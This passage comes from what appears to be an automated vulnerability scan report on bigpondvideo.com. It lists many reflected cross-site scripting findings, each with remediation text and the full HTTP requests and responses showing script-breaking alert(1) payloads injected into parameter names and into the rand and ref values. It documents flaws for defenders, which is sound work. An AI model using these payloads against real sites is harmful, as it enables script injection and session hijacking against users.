HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:34 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58297
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306eaf4d6&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=255144</script><script>alert(1)</script>0b3d6cfc56&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.491. http://bigpondvideo.com/Web/Flash/main_nav [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/main_nav
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8eded</script><script>alert(1)</script>7927fe1d530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/main_nav?8eded</script><script>alert(1)</script>7927fe1d530=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:31 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306bf3f56&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&8eded</script><script>alert(1)</script>7927fe1d530=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b8bd</script><script>alert(1)</script>77b5c290111 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/main_nav?rand=22b8bd</script><script>alert(1)</script>77b5c290111 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:27 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306740a73&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=22b8bd</script><script>alert(1)</script>77b5c290111&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.493. http://bigpondvideo.com/Web/Flash/presentationPlayer [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/presentationPlayer
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb1c2</script><script>alert(1)</script>7eaa5ec3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/presentationPlayer?eb1c2</script><script>alert(1)</script>7eaa5ec3b9=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:40 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3074949e2&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&eb1c2</script><script>alert(1)</script>7eaa5ec3b9=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1072c</script><script>alert(1)</script>5624f8a0379 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/presentationPlayer?rand=21072c</script><script>alert(1)</script>5624f8a0379 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:35 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306f16b74&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=21072c</script><script>alert(1)</script>5624f8a0379&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.495. http://bigpondvideo.com/Web/Flash/skyscraperL [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/skyscraperL
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92b3c</script><script>alert(1)</script>39d188c5399 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/skyscraperL?92b3c</script><script>alert(1)</script>39d188c5399=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:32 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306cbe8e2&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&92b3c</script><script>alert(1)</script>39d188c5399=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db9c2</script><script>alert(1)</script>594a0b6d6c1 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/skyscraperL?rand=2db9c2</script><script>alert(1)</script>594a0b6d6c1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:20 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3060b6e35&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2db9c2</script><script>alert(1)</script>594a0b6d6c1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.497. http://bigpondvideo.com/Web/Flash/skyscraperR [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/skyscraperR
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf9fb</script><script>alert(1)</script>eb7bc4b9bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/skyscraperR?cf9fb</script><script>alert(1)</script>eb7bc4b9bc1=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:31 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306bf024d&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&cf9fb</script><script>alert(1)</script>eb7bc4b9bc1=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 499b8</script><script>alert(1)</script>1c40c13ffef was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/skyscraperR?rand=2499b8</script><script>alert(1)</script>1c40c13ffef HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:25 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3065e87ed&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2499b8</script><script>alert(1)</script>1c40c13ffef&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.499. http://bigpondvideo.com/Web/Flash/title_bar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/title_bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24f17</script><script>alert(1)</script>cceeffabb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/title_bar?24f17</script><script>alert(1)</script>cceeffabb68=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:37 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30711e59f&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&24f17</script><script>alert(1)</script>cceeffabb68=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b087</script><script>alert(1)</script>a4f8a63dab7 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/title_bar?rand=25b087</script><script>alert(1)</script>a4f8a63dab7 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:30 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306a447a2&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=25b087</script><script>alert(1)</script>a4f8a63dab7&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.501. http://bigpondvideo.com/footytv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/footytv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be39c</script><script>alert(1)</script>093cbd07583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footytv/?be39c</script><script>alert(1)</script>093cbd07583=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:22 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb302653860&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&be39c</script><script>alert(1)</script>093cbd07583=1&channelId=103&channelTitle=footytv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7435d</script><script>alert(1)</script>b1776d07c6 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footytv/?ref=Net-Head-TV-Footy7435d</script><script>alert(1)</script>b1776d07c6 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:18 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... /go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30226695b&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Footy7435d</script><script>alert(1)</script>b1776d07c6&channelId=103&channelTitle=footytv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.503. http://bigpondvideo.com/games/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/games/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60dc5</script><script>alert(1)</script>635bf275af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/?60dc5</script><script>alert(1)</script>635bf275af3=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:50 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3042482aa&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&60dc5</script><script>alert(1)</script>635bf275af3=1&navId=473&channelTitle=Games&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17b81</script><script>alert(1)</script>cb1d9075c4b was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/?ref=Net-Head-TV-Games17b81</script><script>alert(1)</script>cb1d9075c4b HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
